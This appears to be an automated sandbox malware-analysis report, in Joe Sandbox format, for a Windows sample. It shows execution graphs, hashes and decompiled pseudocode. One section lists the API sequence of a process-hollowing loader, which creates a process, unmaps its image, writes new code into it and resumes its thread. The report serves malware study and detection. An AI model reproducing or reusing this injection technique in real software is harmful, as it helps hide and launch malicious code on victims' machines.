                      • Source File: 00000000.00000002.361505469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.361501884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.361550403.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.361575239.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.361775443.0000000000B32000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.361783200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_p3jNeWT0GE.jbxd
                      Similarity
                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                      • String ID:
                      • API String ID: 2579439406-0
                      • Opcode ID: 3e5b1e7b3b0f287d6d4687034788962d74a39f4ca44c0a899086d8940bc32795
                      • Instruction ID: a500e2dbcc2fe5f9397c81edabffc5080b59068054ba58565fd70249a857dba8
                      • Opcode Fuzzy Hash: 3e5b1e7b3b0f287d6d4687034788962d74a39f4ca44c0a899086d8940bc32795
                      • Instruction Fuzzy Hash: D621CEB8805214DFD704EF29FD456587BF0FF18715F20456AE809A33B0EB749A858FA9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.361789430.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_c20000_p3jNeWT0GE.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction ID: 8101f4bf6758fc53cc8fb827deb6ac1f5677b0744d2ab276eb69ee416ae86bcb
                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction Fuzzy Hash: E91170723401109FE754DE65ECD1FA673EAFB88320B298156E908CB712D675EC01C760
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:6.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0%
                      Total number of Nodes:19
                      Total number of Limit Nodes:0
                      execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                      Control-flow Graph

                      C-Code - Quality: 23%
                      			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				char _v8;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t11;
                      				void* _t16;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t20;
                      				void* _t21;
                      
                      				_t22 = __eflags;
                      				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                      				_t17 = _a4;
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                      				if(_t11 != 0) {
                      					_push(_a16);
                      					_push(_v8);
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, _t20); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				return __eax;
                      			}














                      0x0040180c
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000001.00000002.442301306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_p3jNeWT0GE.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                      • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                      • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                      • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000001.00000002.442301306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_p3jNeWT0GE.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                      • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                      • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                      • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 17%
                      			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t11;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t22;
                      
                      				_t23 = __eflags;
                      				asm("out 0x95, eax");
                      				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t17 =  *((intOrPtr*)(_t22 + 8));
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                      				if(_t11 != 0) {
                      					_push( *((intOrPtr*)(_t22 + 0x14)));
                      					_push( *((intOrPtr*)(_t22 - 4)));
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, __edi); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}







                      0x00401822
                      0x00401822
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000001.00000002.442301306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_p3jNeWT0GE.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                      • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                      • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                      • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 17%
                      			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t8;
                      				void* _t11;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t22;
                      
                      				_t23 = __eflags;
                      				asm("sbb ebx, ebp");
                      				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t17 =  *((intOrPtr*)(_t22 + 8));
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                      				if(_t11 != 0) {
                      					_push( *((intOrPtr*)(_t22 + 0x14)));
                      					_push( *((intOrPtr*)(_t22 - 4)));
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, __edi); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}








                      0x00401826
                      0x00401826
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000001.00000002.442301306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_p3jNeWT0GE.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                      • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                      • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                      • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 20%
                      			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                      				void* _t10;
                      				void* _t13;
                      				intOrPtr* _t19;
                      				void* _t22;
                      				void* _t25;
                      
                      				_t26 = __eflags;
                      				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                      				_t19 =  *((intOrPtr*)(_t25 + 8));
                      				Sleep(0x1388);
                      				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                      				if(_t13 != 0) {
                      					_push( *((intOrPtr*)(_t25 + 0x14)));
                      					_push( *((intOrPtr*)(_t25 - 4)));
                      					_push(_t13);
                      					_push(_t19); // executed
                      					L00401455(0x60, _t22, __edi); // executed
                      				}
                      				 *_t19(0xffffffff, 0); // executed
                      				_t19 = _t19 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                      				_pop(__edi);
                      				_pop(__esi);
                      				_pop(__ebx);
                      				__esp = __ebp;
                      				_pop(__ebp);
                      				return __eax;
                      			}








                      0x00401834
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x00401899
                      0x0040189e
                      0x0040189f
                      0x004018a0
                      0x004018a1
                      0x004018a1
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 00000001.00000002.442301306.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_p3jNeWT0GE.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                      • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                      • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                      • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:64.7%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:26
                      Total number of Limit Nodes:7
                      execution_graph 229 c20000 232 c20630 229->232 231 c20005 233 c2064c 232->233 235 c21577 233->235 238 c205b0 235->238 239 c205dc 238->239 240 c205e2 GetFileAttributesA 239->240 241 c2061e 239->241 243 c20420 239->243 240->239 244 c204f3 243->244 245 c204fa 244->245 246 c204ff CreateWindowExA 244->246 245->239 246->245 247 c20540 PostMessageA 246->247 248 c2055f 247->248 248->245 250 c20110 VirtualAlloc GetModuleFileNameA 248->250 251 c20414 250->251 252 c2017d CreateProcessA 250->252 251->248 252->251 254 c2025f VirtualFree VirtualAlloc GetThreadContext 252->254 254->251 255 c202a9 ReadProcessMemory 254->255 256 c202e5 VirtualAllocEx NtWriteVirtualMemory 255->256 257 c202d5 NtUnmapViewOfSection 255->257 258 c2033b 256->258 257->256 259 c20350 NtWriteVirtualMemory 258->259 260 c2039d WriteProcessMemory SetThreadContext ResumeThread 258->260 259->258 261 c203fb ExitProcess 260->261

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_00C20042 1 Function_00C200C3 0->1 2 Function_00C228CC 3 Function_00C224D2 4 Function_00C22452 5 Function_00C224D1 6 Function_00C23355 7 Function_00C22DD5 8 Function_00C224DD 9 Function_00C23361 10 Function_00C219E6 11 Function_00C21CE4 12 Function_00C21EE8 13 Function_00C22369 14 Function_00C22573 15 Function_00C21970 16 Function_00C233F1 17 Function_00C23571 18 Function_00C21577 56 Function_00C205B0 18->56 19 Function_00C21977 20 Function_00C22275 21 Function_00C234FA 22 Function_00C22B7B 23 Function_00C22EFE 24 Function_00C2187F 25 Function_00C22F7C 26 Function_00C220FD 27 Function_00C20000 57 Function_00C20630 27->57 28 Function_00C21D01 29 Function_00C22506 30 Function_00C23487 31 Function_00C21804 32 Function_00C21E84 33 Function_00C2338A 34 Function_00C21B0B 35 Function_00C2198B 36 Function_00C22D8F 37 Function_00C20110 38 Function_00C20010 38->0 39 Function_00C21D95 40 Function_00C22D15 41 Function_00C2341B 42 Function_00C21F99 43 Function_00C21B9F 44 Function_00C21D1F 45 Function_00C2349F 46 Function_00C22622 47 Function_00C228A2 48 Function_00C20420 48->37 49 Function_00C21E26 50 Function_00C21F26 51 Function_00C22EA6 52 Function_00C233A4 53 Function_00C21EA5 54 Function_00C2222C 55 Function_00C23133 56->48 57->18 57->38 58 Function_00C234B0 59 Function_00C21A37 60 Function_00C22F34 61 Function_00C21EB5 62 Function_00C21ABA 63 Function_00C2343A 64 Function_00C22D3B 65 Function_00C21B3F 66 Function_00C22FBD

                      Control-flow Graph

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00C20156
                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 00C2016C
                      • CreateProcessA.KERNELBASE(?,00000000), ref: 00C20255
                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00C20270
                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00C20283
                      • GetThreadContext.KERNELBASE(00000000,?), ref: 00C2029F
                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00C202C8
                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 00C202E3
                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00C20304
                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 00C2032A
                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00C20399
                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00C203BF
                      • SetThreadContext.KERNELBASE(00000000,?), ref: 00C203E1
                      • ResumeThread.KERNELBASE(00000000), ref: 00C203ED
                      • ExitProcess.KERNEL32(00000000), ref: 00C20412
                      Memory Dump Source
                      • Source File: 0000000C.00000002.489209147.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_c20000_hdgaecu.jbxd
                      Similarity
                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                      • String ID:
                      • API String ID: 2875986403-0
                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                      • Instruction ID: 06bfb7425c0a9c0434de567a4cb7c0ba4bb84a37d75942beeb9f494139e8c643
                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                      • Instruction Fuzzy Hash: D0B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 15 c20420-c204f8 17 c204fa 15->17 18 c204ff-c2053c CreateWindowExA 15->18 19 c205aa-c205ad 17->19 20 c20540-c20558 PostMessageA 18->20 21 c2053e 18->21 22 c2055f-c20563 20->22 21->19 22->19 23 c20565-c20579 22->23 23->19 25 c2057b-c20582 23->25 26 c20584-c20588 25->26 27 c205a8 25->27 26->27 28 c2058a-c20591 26->28 27->22 28->27 29 c20593-c20597 call c20110 28->29 31 c2059c-c205a5 29->31 31->27
                      APIs
                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00C20533
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.489209147.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_c20000_hdgaecu.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                      • API String ID: 716092398-2341455598
                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                      • Instruction ID: 1a58cf7b8d1f5c789da168c4b3f0847dba151b8a8b493a07c3609e6fd9ea740c
                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                      • Instruction Fuzzy Hash: F2512B70D08388DEEB11CBD8D849BDDBFB2AF11708F244059E5447F286C3BA5658CBA6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 32 c205b0-c205d5 33 c205dc-c205e0 32->33 34 c205e2-c205f5 GetFileAttributesA 33->34 35 c2061e-c20621 33->35 36 c20613-c2061c 34->36 37 c205f7-c205fe 34->37 36->33 37->36 38 c20600-c2060b call c20420 37->38 40 c20610 38->40 40->36
                      APIs
                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 00C205EC
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.489209147.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_c20000_hdgaecu.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID: apfHQ$o
                      • API String ID: 3188754299-2999369273
                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                      • Instruction ID: 5169765d158abf9b6663308e9e9aa7144def4d63c61e566b44f13208124d59b1
                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                      • Instruction Fuzzy Hash: 0A011E70C0425CEEDF10DB98D5583AEBFB5AF41308F248099D8192B342D7B69B58CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:6.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:0%
                      Total number of Nodes:19
                      Total number of Limit Nodes:0
                      execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                      Control-flow Graph

                      C-Code - Quality: 23%
                      			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				char _v8;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				void* _t11;
                      				void* _t16;
                      				intOrPtr* _t17;
                      				void* _t19;
                      				void* _t20;
                      				void* _t21;
                      
                      				_t22 = __eflags;
                      				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                      				_t17 = _a4;
                      				Sleep(0x1388);
                      				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                      				if(_t11 != 0) {
                      					_push(_a16);
                      					_push(_v8);
                      					_push(_t11);
                      					_push(_t17); // executed
                      					L00401455(0x60, _t19, _t20); // executed
                      				}
                      				 *_t17(0xffffffff, 0); // executed
                      				_t17 = _t17 + 0x60;
                      				_push(0x60);
                      				asm("pushad");
                      				__ecx =  *__esp;
                      				__esp = __esp + 4;
                      				return __eax;
                      			}














                      0x0040180c
                      0x00401839
                      0x0040183e
                      0x00401846
                      0x00401854
                      0x0040185b
                      0x0040185d
                      0x00401860
                      0x00401863
                      0x00401864
                      0x00401865
                      0x00401865
                      0x0040186e
                      0x0040187a
                      0x0040188a
                      0x0040188b
                      0x0040188c
                      0x0040188f
                      0x004018a2

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 0000000D.00000002.501563110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_hdgaecu.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
                      • API String ID: 417527130-0
                      • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                      • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                      • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                      • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 00401846
                      • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                      Memory Dump Source
                      • Source File: 0000000D.00000002.501563110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_hdgaecu.jbxd
                      Similarity
                      • API ID: ProcessSleepTerminate
                      • String ID:
